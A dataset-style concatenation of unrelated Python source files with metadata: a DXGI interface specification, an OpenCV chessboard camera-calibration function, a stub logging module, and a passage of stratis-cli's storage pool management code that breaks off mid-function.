(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, 'GraphicsPreemptionGranularity'),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, 'ComputePreemptionGranularity'),
])
DXGI_OUTPUT_DESC1 = Struct('DXGI_OUTPUT_DESC1', [
(WString, 'DeviceName'),
(RECT, 'DesktopCoordinates'),
(BOOL, 'AttachedToDesktop'),
(DXGI_MODE_ROTATION, 'Rotation'),
(HMONITOR, 'Monitor'),
(UINT, 'BitsPerColor'),
(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'),
(Array(FLOAT, 2), 'RedPrimary'),
(Array(FLOAT, 2), 'GreenPrimary'),
(Array(FLOAT, 2), 'BluePrimary'),
(Array(FLOAT, 2), 'WhitePoint'),
(FLOAT, 'MinLuminance'),
(FLOAT, 'MaxLuminance'),
(FLOAT, 'MaxFullFrameLuminance'),
])
DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS = Flags(UINT, [
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_FULLSCREEN',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_WINDOWED',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_CURSOR_STRETCHED',
])
DXGI_GPU_PREFERENCE = Enum('DXGI_GPU_PREFERENCE', [
'DXGI_GPU_PREFERENCE_UNSPECIFIED',
'DXGI_GPU_PREFERENCE_MINIMUM_POWER',
'DXGI_GPU_PREFERENCE_HIGH_PERFORMANCE',
])
IDXGIFactory6 = Interface('IDXGIFactory6', IDXGIFactory5)
IDXGIAdapter4 = Interface('IDXGIAdapter4', IDXGIAdapter3)
IDXGIOutput6 = Interface('IDXGIOutput6', IDXGIOutput5)
IDXGIAdapter4.methods += [
StdMethod(HRESULT, 'GetDesc3', [Out(Pointer(DXGI_ADAPTER_DESC3), 'pDesc')], sideeffects=False),
]
IDXGIOutput6.methods += [
StdMethod(HRESULT, 'GetDesc1', [Out(Pointer(DXGI_OUTPUT_DESC1), 'pDesc')], sideeffects=False),
StdMethod(HRESULT, 'CheckHardwareCompositionSupport', [Out(Pointer(DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS), 'pFlags')], sideeffects=False),
]
IDXGIFactory6.methods += [
StdMethod(HRESULT, 'EnumAdapterByGpuPreference', [(UINT, 'Adapter'), (DXGI_GPU_PREFERENCE, 'GpuPreference'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
dxgi.addInterfaces([
IDXGIFactory6,
IDXGIAdapter4,
IDXGIOutput6,
])
dxgi.addFunctions([
StdFunction(HRESULT, "DXGIDeclareAdapterRemovalSupport", [], sideeffects=False),
])
| en | 0.617361 | ########################################################################## # # Copyright 2014 VMware, Inc # Copyright 2011 <NAME> # All Rights Reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # ##########################################################################/ # IDXGIKeyedMutex::AcquireSync # 0 # 3 # 1 # 2 #"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_TO_ALL_HOLOGRAPHIC_DISPLAYS", # DXGI 1.6 # Avoid NumGammaControlPoints mismatch # # DXGI 1.2 # # # DXGI 1.3 # # XXX: Flags # # Undocumented interfaces # # http://shchetinin.blogspot.co.uk/2012/04/dwm-graphics-directx-win8win7.html # # DXGI 1.4 # # # DXGI 1.5 # # # DXGI 1.6 # | 1.265041 | 1 |
code/camera_calib.py | nitchith/CarND-Advanced-Lane-Lines | 0 | 8519 | <filename>code/camera_calib.py<gh_stars>0
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
def camera_calibrate(images_list, nx=9, ny=6, show_corners=False):
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((ny*nx,3), np.float32)
objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob(images_list)
if show_corners:
fig = plt.figure(figsize=(30, 30))
rows = 5
cols = 4
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (nx,ny),None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Draw and display the corners
if show_corners:
img = cv2.drawChessboardCorners(img, (nx,ny), corners, ret)
ax = plt.subplot(rows, cols, idx + 1)
ax.set_title(fname)
plt.imshow(img)
return cv2.calibrateCamera(objpoints, imgpoints, gray.shape[1::-1], None, None) | <filename>code/camera_calib.py<gh_stars>0
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
def camera_calibrate(images_list, nx=9, ny=6, show_corners=False):
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((ny*nx,3), np.float32)
objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob(images_list)
if show_corners:
fig = plt.figure(figsize=(30, 30))
rows = 5
cols = 4
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (nx,ny),None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Draw and display the corners
if show_corners:
img = cv2.drawChessboardCorners(img, (nx,ny), corners, ret)
ax = plt.subplot(rows, cols, idx + 1)
ax.set_title(fname)
plt.imshow(img)
return cv2.calibrateCamera(objpoints, imgpoints, gray.shape[1::-1], None, None) | en | 0.776663 | # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0) # Arrays to store object points and image points from all the images. # 3d points in real world space # 2d points in image plane. # Make a list of calibration images # Step through the list and search for chessboard corners # Find the chessboard corners # If found, add object points, image points # Draw and display the corners | 2.994801 | 3 |
python-jenkins/yaml_read_config/custom_log.py | MathiasStadler/docker-jenkins-scripted | 0 | 8520 | """ module logging"""
# logging
| """ module logging"""
# logging
| en | 0.272248 | module logging # logging | 1.098673 | 1 |
src/stratis_cli/_actions/_pool.py | stratis-storage/stratis-cli | 94 | 8521 | <gh_stars>10-100
# Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Pool actions.
"""
# isort: STDLIB
import os
from collections import defaultdict
# isort: THIRDPARTY
from justbytes import Range
from .._constants import PoolMaintenanceErrorCode
from .._errors import (
StratisCliAggregateError,
StratisCliEngineError,
StratisCliIncoherenceError,
StratisCliInUseOtherTierError,
StratisCliInUseSameTierError,
StratisCliNameConflictError,
StratisCliNoChangeError,
StratisCliPartialChangeError,
StratisCliPartialFailureError,
)
from .._stratisd_constants import BlockDevTiers, PoolActionAvailability, StratisdErrors
from ._connection import get_object
from ._constants import TOP_OBJECT
from ._formatting import get_property, print_table, size_triple, to_hyphenated
from ._utils import get_clevis_info
def _generate_pools_to_blockdevs(managed_objects, to_be_added, tier):
"""
Generate a map of pools to which block devices they own
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param tier: tier to search for blockdevs to be added
:type tier: _stratisd_constants.BlockDevTiers
:returns: a map of pool names to sets of strings containing blockdevs they own
:rtype: dict of str * frozenset of str
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, MOPool, devs, pools
pool_map = dict(
(path, str(MOPool(info).Name()))
for (path, info) in pools().search(managed_objects)
)
pools_to_blockdevs = defaultdict(list)
for modev in (
modev
for modev in (
MODev(info)
for (_, info) in devs(props={"Tier": tier}).search(managed_objects)
)
if str(modev.Devnode()) in to_be_added
):
pools_to_blockdevs[pool_map[modev.Pool()]].append(str(modev.Devnode()))
return dict(
(pool, frozenset(blockdevs)) for pool, blockdevs in pools_to_blockdevs.items()
)
def _check_opposite_tier(managed_objects, to_be_added, other_tier):
"""
Check whether specified blockdevs are already in the other tier.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param other_tier: the other tier, not the one requested
:type other_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliInUseOtherTierError: if blockdevs are used by other tier
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, other_tier
)
if pools_to_blockdevs != {}:
raise StratisCliInUseOtherTierError(
pools_to_blockdevs,
BlockDevTiers.DATA
if other_tier == BlockDevTiers.CACHE
else BlockDevTiers.CACHE,
)
def _check_same_tier(pool_name, managed_objects, to_be_added, this_tier):
"""
Check whether specified blockdevs are already in the tier to which they
are to be added.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param this_tier: the tier requested
:type this_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliPartialChangeError: if blockdevs are used by this tier
:raises StratisCliInUseSameTierError: if blockdevs are used by this tier in another pool
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, this_tier
)
owned_by_current_pool = frozenset(pools_to_blockdevs.get(pool_name, []))
owned_by_other_pools = dict(
(pool, devnodes)
for pool, devnodes in pools_to_blockdevs.items()
if pool_name != pool
)
if owned_by_current_pool != frozenset():
raise StratisCliPartialChangeError(
"add to cache" if this_tier == BlockDevTiers.CACHE else "add to data",
to_be_added.difference(owned_by_current_pool),
to_be_added.intersection(owned_by_current_pool),
)
if owned_by_other_pools != {}:
raise StratisCliInUseSameTierError(owned_by_other_pools, this_tier)
def _fetch_locked_pools_property(proxy):
"""
Fetch the LockedPools property from stratisd.
:param proxy: proxy to the top object in stratisd
:return: a representation of unlocked devices
:rtype: dict
:raises StratisCliEngineError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
return Manager.Properties.LockedPools.Get(proxy)
class PoolActions:
"""
Pool actions.
"""
@staticmethod
def create_pool(namespace):
"""
Create a stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliNameConflictError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
names = pools(props={"Name": pool_name}).search(managed_objects)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
if list(names) != []:
raise StratisCliNameConflictError("pool", pool_name)
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.DATA)
clevis_info = get_clevis_info(namespace)
((changed, (_, _)), return_code, message) = Manager.Methods.CreatePool(
proxy,
{
"name": pool_name,
"redundancy": (True, 0),
"devices": blockdevs,
"key_desc": (
(True, namespace.key_desc)
if namespace.key_desc is not None
else (False, "")
),
"clevis_info": (False, ("", ""))
if clevis_info is None
else (True, clevis_info),
},
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to create the specified pool %s but stratisd "
"reports that it did not actually create the pool"
)
% pool_name
)
@staticmethod
def init_cache(namespace): # pylint: disable=too-many-locals
"""
Initialize the cache of an existing stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
(pool_object_path, _) = next(
pools(props={"Name": pool_name})
.require_unique_match(True)
.search(managed_objects)
)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE)
((changed, devs_added), return_code, message) = Pool.Methods.InitCache(
get_object(pool_object_path), {"devices": blockdevs}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs as cache "
"to pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def list_pools(namespace):
"""
List all stratis pools.
"""
# pylint: disable=import-outside-toplevel
from ._data import MOPool, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pools_with_props = [
MOPool(info) for objpath, info in pools().search(managed_objects)
]
def physical_size_triple(mopool):
"""
Calculate the triple to display for total physical size.
The format is total/used/free where the display value for each
member of the tuple are chosen automatically according to justbytes'
configuration.
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:returns: a string to display in the resulting list output
:rtype: str
"""
total_physical_size = Range(mopool.TotalPhysicalSize())
total_physical_used = get_property(mopool.TotalPhysicalUsed(), Range, None)
return size_triple(total_physical_size, total_physical_used)
def properties_string(mopool):
"""
Make a string encoding some important properties of the pool
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:param props_map: a map of properties returned by GetAllProperties
:type props_map: dict of str * any
"""
def gen_string(has_property, code):
"""
Generate the display string for a boolean property
:param has_property: whether the property is true or false
:type has_property: bool or NoneType
:param str code: the code to generate the string for
:returns: the generated string
:rtype: str
"""
if has_property == True: # pylint: disable=singleton-comparison
prefix = " "
elif has_property == False: # pylint: disable=singleton-comparison
prefix = "~"
# This is only going to occur if the engine experiences an
# error while calculating a property or if our code has a bug.
else: # pragma: no cover
prefix = "?"
return prefix + code
props_list = [(mopool.HasCache(), "Ca"), (mopool.Encrypted(), "Cr")]
return ",".join(gen_string(x, y) for x, y in props_list)
format_uuid = (
(lambda mo_uuid: mo_uuid) if namespace.unhyphenated_uuids else to_hyphenated
)
def alert_string(mopool):
"""
Alert information to display, if any
:param mopool: object to access pool properties
:returns: string w/ alert information, "" if no alert
:rtype: str
"""
action_availability = PoolActionAvailability.from_str(
mopool.AvailableActions()
)
error_codes = action_availability.pool_maintenance_error_codes()
return ", ".join(sorted(str(code) for code in error_codes))
tables = [
(
mopool.Name(),
physical_size_triple(mopool),
properties_string(mopool),
format_uuid(mopool.Uuid()),
alert_string(mopool),
)
for mopool in pools_with_props
]
print_table(
["Name", "Total Physical", "Properties", "UUID", "Alerts"],
sorted(tables, key=lambda entry: entry[0]),
["<", ">", ">", ">", "<"],
)
@staticmethod
def destroy_pool(namespace):
"""
Destroy a stratis pool.
If no pool exists, the method succeeds.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Manager.Methods.DestroyPool(
proxy, {"pool": pool_object_path}
)
# This branch can be covered, since the engine will return an error
# if the pool can not be destroyed because it has filesystems.
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to destroy the specified pool %s but "
"stratisd reports that it did not actually "
"destroy the pool requested"
)
% namespace.pool_name
)
@staticmethod
def rename_pool(namespace):
"""
Rename a pool.
:raises StratisCliEngineError:
:raises StratisCliNoChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import ObjectManager, Pool, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.current})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Pool.Methods.SetName(
get_object(pool_object_path), {"name": namespace.new}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed:
raise StratisCliNoChangeError("rename", namespace.new)
@staticmethod
def add_data_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified data devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.DATA
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddDataDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the data tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def add_cache_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified cache devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddCacheDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the cache tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def unlock_pools(namespace):
"""
Unlock all of the encrypted pools that have been detected by the daemon
but are still locked.
:raises StratisCliIncoherenceError:
:raises StratisCliNoChangeError:
:raises StratisCliAggregateError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
proxy = get_object(TOP_OBJECT)
locked_pools = _fetch_locked_pools_property(proxy)
if locked_pools == {}: # pragma: no cover
raise StratisCliNoChangeError("unlock", "pools")
# This block is not covered as the sim engine does not simulate the
# management of unlocked devices, so locked_pools is always empty.
errors = [] # pragma: no cover
for uuid in locked_pools: # pragma: no cover
(
(is_some, unlocked_devices),
return_code,
message,
) = Manager.Methods.UnlockPool(
proxy, {"pool_uuid": uuid, "unlock_method": namespace.unlock_method}
)
if return_code != StratisdErrors.OK:
errors.append(
StratisCliPartialFailureError(
"unlock", "pool with UUID %s" % uuid, error_message=message
)
)
if is_some and unlocked_devices == []:
raise StratisCliIncoherenceError(
(
"stratisd reported that some existing devices are locked but "
"no new devices were unlocked during this operation"
)
)
if errors != []: # pragma: no cover
raise StratisCliAggregateError("unlock", "pool", errors)
@staticmethod
def explain_code(namespace):
"""
Print an explanation of pool error code.
"""
error_code = PoolMaintenanceErrorCode.from_str(namespace.code)
assert error_code is not None
print(error_code.explain())
| # Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Pool actions.
"""
# isort: STDLIB
import os
from collections import defaultdict
# isort: THIRDPARTY
from justbytes import Range
from .._constants import PoolMaintenanceErrorCode
from .._errors import (
StratisCliAggregateError,
StratisCliEngineError,
StratisCliIncoherenceError,
StratisCliInUseOtherTierError,
StratisCliInUseSameTierError,
StratisCliNameConflictError,
StratisCliNoChangeError,
StratisCliPartialChangeError,
StratisCliPartialFailureError,
)
from .._stratisd_constants import BlockDevTiers, PoolActionAvailability, StratisdErrors
from ._connection import get_object
from ._constants import TOP_OBJECT
from ._formatting import get_property, print_table, size_triple, to_hyphenated
from ._utils import get_clevis_info
def _generate_pools_to_blockdevs(managed_objects, to_be_added, tier):
"""
Generate a map of pools to which block devices they own
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param tier: tier to search for blockdevs to be added
:type tier: _stratisd_constants.BlockDevTiers
:returns: a map of pool names to sets of strings containing blockdevs they own
:rtype: dict of str * frozenset of str
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, MOPool, devs, pools
pool_map = dict(
(path, str(MOPool(info).Name()))
for (path, info) in pools().search(managed_objects)
)
pools_to_blockdevs = defaultdict(list)
for modev in (
modev
for modev in (
MODev(info)
for (_, info) in devs(props={"Tier": tier}).search(managed_objects)
)
if str(modev.Devnode()) in to_be_added
):
pools_to_blockdevs[pool_map[modev.Pool()]].append(str(modev.Devnode()))
return dict(
(pool, frozenset(blockdevs)) for pool, blockdevs in pools_to_blockdevs.items()
)
def _check_opposite_tier(managed_objects, to_be_added, other_tier):
"""
Check whether specified blockdevs are already in the other tier.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param other_tier: the other tier, not the one requested
:type other_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliInUseOtherTierError: if blockdevs are used by other tier
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, other_tier
)
if pools_to_blockdevs != {}:
raise StratisCliInUseOtherTierError(
pools_to_blockdevs,
BlockDevTiers.DATA
if other_tier == BlockDevTiers.CACHE
else BlockDevTiers.CACHE,
)
def _check_same_tier(pool_name, managed_objects, to_be_added, this_tier):
"""
Check whether specified blockdevs are already in the tier to which they
are to be added.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param this_tier: the tier requested
:type this_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliPartialChangeError: if blockdevs are used by this tier
:raises StratisCliInUseSameTierError: if blockdevs are used by this tier in another pool
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, this_tier
)
owned_by_current_pool = frozenset(pools_to_blockdevs.get(pool_name, []))
owned_by_other_pools = dict(
(pool, devnodes)
for pool, devnodes in pools_to_blockdevs.items()
if pool_name != pool
)
if owned_by_current_pool != frozenset():
raise StratisCliPartialChangeError(
"add to cache" if this_tier == BlockDevTiers.CACHE else "add to data",
to_be_added.difference(owned_by_current_pool),
to_be_added.intersection(owned_by_current_pool),
)
if owned_by_other_pools != {}:
raise StratisCliInUseSameTierError(owned_by_other_pools, this_tier)
def _fetch_locked_pools_property(proxy):
"""
Fetch the LockedPools property from stratisd.
:param proxy: proxy to the top object in stratisd
:return: a representation of unlocked devices
:rtype: dict
:raises StratisCliEngineError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
return Manager.Properties.LockedPools.Get(proxy)
class PoolActions:
"""
Pool actions.
"""
@staticmethod
def create_pool(namespace):
"""
Create a stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliNameConflictError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
names = pools(props={"Name": pool_name}).search(managed_objects)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
if list(names) != []:
raise StratisCliNameConflictError("pool", pool_name)
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.DATA)
clevis_info = get_clevis_info(namespace)
((changed, (_, _)), return_code, message) = Manager.Methods.CreatePool(
proxy,
{
"name": pool_name,
"redundancy": (True, 0),
"devices": blockdevs,
"key_desc": (
(True, namespace.key_desc)
if namespace.key_desc is not None
else (False, "")
),
"clevis_info": (False, ("", ""))
if clevis_info is None
else (True, clevis_info),
},
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to create the specified pool %s but stratisd "
"reports that it did not actually create the pool"
)
% pool_name
)
@staticmethod
def init_cache(namespace): # pylint: disable=too-many-locals
"""
Initialize the cache of an existing stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
(pool_object_path, _) = next(
pools(props={"Name": pool_name})
.require_unique_match(True)
.search(managed_objects)
)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE)
((changed, devs_added), return_code, message) = Pool.Methods.InitCache(
get_object(pool_object_path), {"devices": blockdevs}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs as cache "
"to pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def list_pools(namespace):
"""
List all stratis pools.
"""
# pylint: disable=import-outside-toplevel
from ._data import MOPool, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pools_with_props = [
MOPool(info) for objpath, info in pools().search(managed_objects)
]
def physical_size_triple(mopool):
"""
Calculate the triple to display for total physical size.
The format is total/used/free where the display value for each
member of the tuple are chosen automatically according to justbytes'
configuration.
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:returns: a string to display in the resulting list output
:rtype: str
"""
total_physical_size = Range(mopool.TotalPhysicalSize())
total_physical_used = get_property(mopool.TotalPhysicalUsed(), Range, None)
return size_triple(total_physical_size, total_physical_used)
def properties_string(mopool):
"""
Make a string encoding some important properties of the pool
